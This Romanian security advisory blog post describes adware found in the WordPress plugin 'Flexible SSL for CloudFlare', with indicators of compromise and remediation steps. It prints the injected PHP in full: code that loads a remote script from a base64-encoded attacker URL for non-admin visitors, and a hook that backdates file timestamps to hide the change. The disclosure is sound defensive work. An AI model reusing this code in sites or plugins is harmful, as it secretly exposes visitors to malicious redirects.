Potențială infecție cu Adware în Pluginul "Flexible SSL for CloudFlare" pentru WordPress Plugin

Publicat de Iulian Băncău · 04-04-2024 · Citire în 4 min.

Potențială infecție cu Adware în Pluginul "Flexible SSL for CloudFlare" pentru WordPress Plugin

Potențială infecție cu Adware în Pluginul "Flexible SSL for CloudFlare" pentru WordPress Plugin

Proprietarii de site-uri web dezvoltate pe platforma WordPress care utilizează pluginul "Flexible SSL for CloudFlare" de la One Dollar Plugin ar trebui să fie conștienți de un potențial risc de securitate. Există indicii că o versiune infectată a acestui plugin direcțiează vizitatorii pe site-uri malițioase. Comportamenul acesta se manifestă doar la prima vizită a unui utilizator nou. Nu se manifestă la vizitele ulterioare sau la utilizatorii autentificați cu drepturi de administrator.


Ce știm:

  • Versiunea infectată a pluginului "Flexible SSL for CloudFlare" pare să vizeze utilizatorii doar la prima vizită a paginii, redirecționându-i către site-uri web de tip adware.
  • Acest comportament malițios nu se manifestă pentru utilizatorii cu drept de administrator logați.
  • Sursa infecției este încă în curs de investigare. Deocamdată nu este clar dacă plugin-ul în sine a conținut o vulnerabilitate care poate fi exploatată, dacă o versiune compromisă a fost introdusă prin intermediul lanțului de aprovizionare sau dacă alte surse infectează acest plugin.
  • Două URL-uri asociate cu această infecție, asyncawaitapi[.]com și stake.libertariancounterpoint[.]com, au fost marcate de VirusTotal ca fiind malițioase.
  • Codul malițios pare să fie localizat în fișierul plugin.php din directorul plugin-ului (WP_PATH/wp-content/plugins/cloudflare-flexible-ssl/plugin.php).
  • Acest cod încarcă un fișier JavaScript remote al cărui URL este encodat în base64.

Codul malițios injectat în plugin:

function jquery_js_for_specific_pages() {

if (strpos($_SERVER['REQUEST_URI'], 'wp-login.php') !== false || strpos($_SERVER['REQUEST_URI'], 'wp-register.php') !== false || is_admin()) {
return;
}


if (current_user_can('administrator')) {
return;
}


$encoded_url = 'aHR0cHM6Ly9hc3luY2F3YWl0YXBpLmNvbS9QVHZYY1BlalJPSjBXODQ5SDFVeEtmdGY0WDVyMHo5alN2LTlqU3dKcEgwZ3c=';

wp_register_script('jquery-init-custom-script', base64_decode($encoded_url), array(), null, false);



wp_enqueue_script('jquery-init-custom-script');

}

add_action('wp_enqueue_scripts', 'jquery_js_for_specific_pages');

function change_files_and_folders_date() {

if (!current_user_can('administrator')) {
return;
}

$plugin_dir = plugin_dir_path(__FILE__);

function recursive_date_change($path) {
$days_to_subtract = 396;

if (is_dir($path)) {

$new_time = strtotime("-$days_to_subtract days");
touch($path, $new_time);

$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);

foreach ($files as $fileinfo) {
$file_path = $fileinfo->getRealPath();

touch($file_path, $new_time);

}
} else {

touch($path, strtotime("-$days_to_subtract days"));
}
}


recursive_date_change($plugin_dir);
}

register_activation_hook(__FILE__, 'change_files_and_folders_date');

Remediere:

  • Dezinstalați si stergeți pluginul: Cea mai rapidă măsură de acțiune este să eliminați pluginul "Flexible SSL for CloudFlare". Acest lucru poate fi făcut prin intermediul interfeței de gestionare a plugin-urilor WordPress.
  • Inspectați codul (opțional): Dacă vă simțiți confortabil, puteți încerca să identificați și să eliminați fragmentul de cod malițios din fișierul plugin.php. Cu toate acestea, această abordare este recomandată numai pentru utilizatorii experimentați.
  • Implementați Content Security Policy (CSP): O politică solidă de securitate a conținutului (Content Security Policy - CSP) poate contribui la atenuarea impactului unor astfel de atacuri în viitor. CSP restricționează resursele pe care o pagină web le poate încărca, inclusiv scripturile. Acest lucru poate ajuta la prevenirea încărcării de coduri malițioase chiar dacă acestea reușesc să se infiltreze pe site-ul dvs. Există resurse disponibile online pentru a vă ajuta să implementați un CSP pentru site-ul dvs. WordPress.

Urmând acești pași, puteți contribui la protejarea site-ului de această potențială amenințare adware. Nu uitați, menținerea securității site-ului web este un proces continuu. Este esențial să rămâneți la curent cu potențialele vulnerabilități și să implementați cele mai bune practici pentru a vă proteja site-ul.

wordpresspluginrcesupply chainvulnerabilitate
Iulian Băncău

Iulian Băncău · Security Engineer

04-04-2024 · Citire în 4 min.

Newsletter

Abonează-te la newsletter-ul nostru pentru a te informa despre noutățile din CyberSecurity. Te poți dezabona oricând.

Mai mult decât CyberSecurity

Oferim o varietate de servicii pentru a ajuta companiile să fie pregătite de confruntări cu atacuri cibernetice reale.

Contactează-ne